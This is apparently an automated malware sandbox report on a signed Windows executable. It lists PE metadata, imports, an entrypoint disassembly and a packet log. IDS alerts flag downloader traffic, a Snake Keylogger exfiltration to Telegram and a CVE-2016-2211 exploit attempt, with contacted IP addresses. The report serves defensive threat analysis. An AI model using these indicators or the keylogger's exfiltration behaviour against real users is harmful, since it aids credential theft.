                                          Error Number:-2146762487
                                          Not Before, Not After
                                          • 20/08/2023 04:02:09 19/08/2026 04:02:09
                                          Subject Chain
                                          • CN="Vicegerents Nolendes ", O=Slvknappede, L=Rockwood, S=Michigan, C=US
                                          Version:3
                                          Thumbprint MD5:8F6ED964E29B10521097F5E1F2D31785
                                          Thumbprint SHA-1:022CE78AA85D6D20EF075D7499744D4516AADF30
                                          Thumbprint SHA-256:E3E76A1533813ED1A2A55533A06A026F62239ED962B809E576E401949A4C3B91
                                          Serial:0F4BC7A006DB1332596FDFB90A31A28AB0444F58

                                          Entrypoint Preview

                                          Instruction
                                          sub esp, 000002D8h
                                          push ebx
                                          push ebp
                                          push esi
                                          push edi
                                          push 00000020h
                                          xor ebp, ebp
                                          pop esi
                                          mov dword ptr [esp+18h], ebp
                                          mov dword ptr [esp+10h], 004092D8h
                                          mov dword ptr [esp+14h], ebp
                                          call dword ptr [00407034h]
                                          push 00008001h
                                          call dword ptr [00407134h]
                                          push ebp
                                          call dword ptr [004072ACh]
                                          push 00000009h
                                          mov dword ptr [00429278h], eax
                                          call 00007F956115D836h
                                          mov dword ptr [004291C4h], eax
                                          push ebp
                                          lea eax, dword ptr [esp+38h]
                                          push 000002B4h
                                          push eax
                                          push ebp
                                          push 00420670h
                                          call dword ptr [0040717Ch]
                                          push 004092C0h
                                          push 004281C0h
                                          call 00007F956115D4A1h
                                          call dword ptr [00407138h]
                                          mov ebx, 00434000h
                                          push eax
                                          push ebx
                                          call 00007F956115D48Fh
                                          push ebp
                                          call dword ptr [0040710Ch]
                                          push 00000022h
                                          mov dword ptr [004291C0h], eax
                                          pop edi
                                          mov eax, ebx
                                          cmp word ptr [00434000h], di
                                          jne 00007F956115A8F9h
                                          mov esi, edi
                                          mov eax, 00434002h
                                          push esi
                                          push eax
                                          call 00007F956115CEDFh
                                          push eax
                                          call dword ptr [00407240h]
                                          mov ecx, eax
                                          mov dword ptr [esp+1Ch], ecx
                                          jmp 00007F956115A9EBh
                                          push 00000020h
                                          pop edx
                                          cmp ax, dx
                                          jne 00007F956115A8F9h
                                          inc ecx
                                          inc ecx
                                          cmp word ptr [ecx], dx

                                          Rich Headers

                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x74940xb4.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x4f0000x69fd8.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x138e200x960
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b8.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x5d980x5e0060fc9e652ab60b696b4471d2d740a415False0.6669714095744681data6.471759151304203IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rdata0x70000x13540x14002f90a087fd075d2b61c65e6db9ea1417False0.4314453125data5.037502749366IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0x90000x202b80x60076eba87d06ba726298375b77b72945b6False0.4733072916666667data3.7505342023618717IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .ndata0x2a0000x250000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rsrc0x4f0000x69fd80x6a000ba23276a82e0d244e1672be1b2a31f09False0.5017619582841981data5.158881628031345IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_ICON0x4f3280x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.4722756457673758
                                          RT_ICON0x913500x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.5095676091328523
                                          RT_ICON0xa1b780x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.5717626655455119
                                          RT_ICON0xab0200x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.583641404805915
                                          RT_ICON0xb04a80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.5690836088804913
                                          RT_ICON0xb46d00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.6310165975103734
                                          RT_ICON0xb6c780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.651735459662289
                                          RT_ICON0xb7d200x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.7151639344262295
                                          RT_DIALOG0xb86a80x100dataEnglishUnited States0.5234375
                                          RT_DIALOG0xb87a80x11cdataEnglishUnited States0.6056338028169014
                                          RT_DIALOG0xb88c80x60dataEnglishUnited States0.7291666666666666
                                          RT_GROUP_ICON0xb89280x76dataEnglishUnited States0.7372881355932204
                                          RT_VERSION0xb89a00x2f8dataEnglishUnited States0.4986842105263158
                                          RT_MANIFEST0xb8c980x33fXML 1.0 document, ASCII text, with very long lines (831), with no line terminatorsEnglishUnited States0.5547533092659447

                                          Imports

                                          DLLImport
                                          KERNEL32.dllCompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, SetFileAttributesW, ExpandEnvironmentStringsW, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, SetErrorMode, GetCommandLineW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
                                          USER32.dllEndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
                                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                          SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                          ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                          COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                          ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                          VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States

                                          Network Behavior

                                          Suricata IDS Alerts

                                          TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                          2024-07-25T09:56:55.795858+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H49746443192.168.2.4188.114.96.3
                                          2024-07-25T09:56:44.263078+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4973780192.168.2.4158.101.44.242
                                          2024-07-25T09:57:07.855040+0200TCP2853006ETPRO MALWARE Snake Keylogger Telegram Exfil49753443192.168.2.4149.154.167.220
                                          2024-07-25T09:56:49.886487+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4974080192.168.2.4158.101.44.242
                                          2024-07-25T09:56:51.785131+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434974213.85.23.86192.168.2.4
                                          2024-07-25T09:56:47.794238+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H49739443192.168.2.4188.114.96.3
                                          2024-07-25T09:56:47.325602+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4973780192.168.2.4158.101.44.242
                                          2024-07-25T09:56:12.458951+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434973040.127.169.103192.168.2.4
                                          2024-07-25T09:56:41.888830+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa49736443192.168.2.4185.98.5.168
                                          2024-07-25T09:56:53.587006+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H49744443192.168.2.4188.114.96.3

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jul 25, 2024 09:56:37.410363913 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:37.410406113 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:37.410590887 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:37.423291922 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:37.423306942 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:41.243168116 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:41.243480921 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:41.438091993 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:41.438122988 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:41.438494921 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:41.438550949 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:41.442693949 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:41.488497972 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:41.888952971 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:41.889035940 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:41.889082909 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:41.889199972 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:41.889199972 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:41.889224052 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:41.889256954 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:41.889271021 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:41.895879984 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:41.895946980 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:41.896019936 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:41.896034956 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:41.896058083 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:41.896080017 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:42.056603909 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:42.056637049 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:42.056945086 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:42.056966066 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:42.057013988 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:42.062400103 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:42.062426090 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:42.062505007 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:42.062515974 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:42.062556028 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:42.066598892 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:42.066622019 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:42.066701889 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:42.066710949 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:42.066747904 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:42.249479055 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:42.249517918 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:42.249774933 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:42.249789000 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:42.249830961 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:42.262808084 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:42.262835979 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:42.262902021 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:42.262917995 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:42.262937069 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:42.262959957 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:42.266331911 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:42.266351938 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:42.266444921 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:42.266465902 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:42.266511917 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:42.267251968 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:42.267308950 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:42.267321110 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:42.267337084 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:42.267359972 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:42.267401934 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:42.267721891 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:42.267739058 CEST44349736185.98.5.168192.168.2.4
                                          Jul 25, 2024 09:56:42.267759085 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:42.267786980 CEST49736443192.168.2.4185.98.5.168
                                          Jul 25, 2024 09:56:43.308645964 CEST4973780192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:43.313673019 CEST8049737158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:43.313752890 CEST4973780192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:43.313987970 CEST4973780192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:43.325756073 CEST8049737158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:44.039083958 CEST8049737158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:44.043277025 CEST4973780192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:44.050964117 CEST8049737158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:44.221239090 CEST8049737158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:44.263077974 CEST4973780192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:44.889420986 CEST49738443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:44.889476061 CEST44349738188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:44.889539957 CEST49738443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:44.891222000 CEST49738443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:44.891237974 CEST44349738188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:45.663990974 CEST44349738188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:45.664077044 CEST49738443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:45.667785883 CEST49738443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:45.667819023 CEST44349738188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:45.668137074 CEST44349738188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:45.674765110 CEST49738443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:45.720510960 CEST44349738188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:45.804851055 CEST44349738188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:45.804961920 CEST44349738188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:45.805162907 CEST49738443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:45.811618090 CEST49738443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:45.821000099 CEST4973780192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:45.826069117 CEST8049737158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:47.189729929 CEST8049737158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:47.192183018 CEST49739443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:47.192246914 CEST44349739188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:47.192331076 CEST49739443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:47.192672968 CEST49739443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:47.192698956 CEST44349739188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:47.325602055 CEST4973780192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:47.655222893 CEST44349739188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:47.660029888 CEST49739443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:47.660083055 CEST44349739188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:47.794159889 CEST44349739188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:47.794255018 CEST44349739188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:47.794342041 CEST49739443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:47.796514034 CEST49739443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:47.801449060 CEST4973780192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:47.802651882 CEST4974080192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:47.806840897 CEST8049737158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:47.806929111 CEST4973780192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:47.807650089 CEST8049740158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:47.807820082 CEST4974080192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:47.807820082 CEST4974080192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:47.814291000 CEST8049740158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:49.885149002 CEST8049740158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:49.886353970 CEST8049740158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:49.886487007 CEST4974080192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:49.886576891 CEST49741443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:49.886636019 CEST44349741188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:49.886707067 CEST49741443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:49.886987925 CEST49741443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:49.887008905 CEST44349741188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:50.421607971 CEST8049740158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:50.421715021 CEST4974080192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:50.883682013 CEST44349741188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:50.885327101 CEST49741443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:50.885361910 CEST44349741188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:51.028048038 CEST44349741188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:51.028170109 CEST44349741188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:51.028218985 CEST49741443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:51.029905081 CEST49741443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:51.098606110 CEST4974380192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:51.110266924 CEST8049743158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:51.110337019 CEST4974380192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:51.110867023 CEST4974380192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:51.118768930 CEST8049743158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:52.869508028 CEST8049743158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:52.891863108 CEST49744443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:52.891932964 CEST44349744188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:52.892046928 CEST49744443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:52.899127007 CEST49744443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:52.899162054 CEST44349744188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:53.028841972 CEST4974380192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:53.454088926 CEST44349744188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:53.456223965 CEST49744443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:53.456252098 CEST44349744188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:53.587034941 CEST44349744188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:53.587136030 CEST44349744188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:53.587189913 CEST49744443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:53.589205027 CEST49744443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:53.593147993 CEST4974380192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:53.594227076 CEST4974580192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:53.598721981 CEST8049743158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:53.598788977 CEST4974380192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:53.599577904 CEST8049745158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:53.599641085 CEST4974580192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:53.599736929 CEST4974580192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:53.606055021 CEST8049745158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:55.177944899 CEST8049745158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:55.185795069 CEST49746443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:55.185834885 CEST44349746188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:55.186059952 CEST49746443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:55.186208010 CEST49746443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:55.186223030 CEST44349746188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:55.217842102 CEST4974580192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:55.673209906 CEST44349746188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:55.683114052 CEST49746443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:55.683130026 CEST44349746188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:55.795876026 CEST44349746188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:55.795999050 CEST44349746188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:55.796066046 CEST49746443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:55.796824932 CEST49746443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:55.800887108 CEST4974580192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:55.802016973 CEST4974780192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:55.810230970 CEST8049745158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:55.810245037 CEST8049747158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:55.810306072 CEST4974580192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:55.810350895 CEST4974780192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:55.810894012 CEST4974780192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:55.819715023 CEST8049747158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:57.163333893 CEST8049747158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:57.165545940 CEST49748443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:57.165586948 CEST44349748188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:57.165688038 CEST49748443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:57.165971994 CEST49748443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:57.165983915 CEST44349748188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:57.216424942 CEST4974780192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:57.644305944 CEST44349748188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:57.649885893 CEST49748443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:57.649898052 CEST44349748188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:57.766343117 CEST44349748188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:57.766453981 CEST44349748188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:57.766621113 CEST49748443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:57.767107010 CEST49748443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:57.770610094 CEST4974780192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:57.771846056 CEST4974980192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:57.776087999 CEST8049747158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:57.776153088 CEST4974780192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:57.777199030 CEST8049749158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:57.777262926 CEST4974980192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:57.777391911 CEST4974980192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:57.782278061 CEST8049749158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:58.525434971 CEST8049749158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:58.526751041 CEST49750443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:58.526791096 CEST44349750188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:58.526870966 CEST49750443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:58.527148962 CEST49750443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:58.527160883 CEST44349750188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:58.575654030 CEST4974980192.168.2.4158.101.44.242
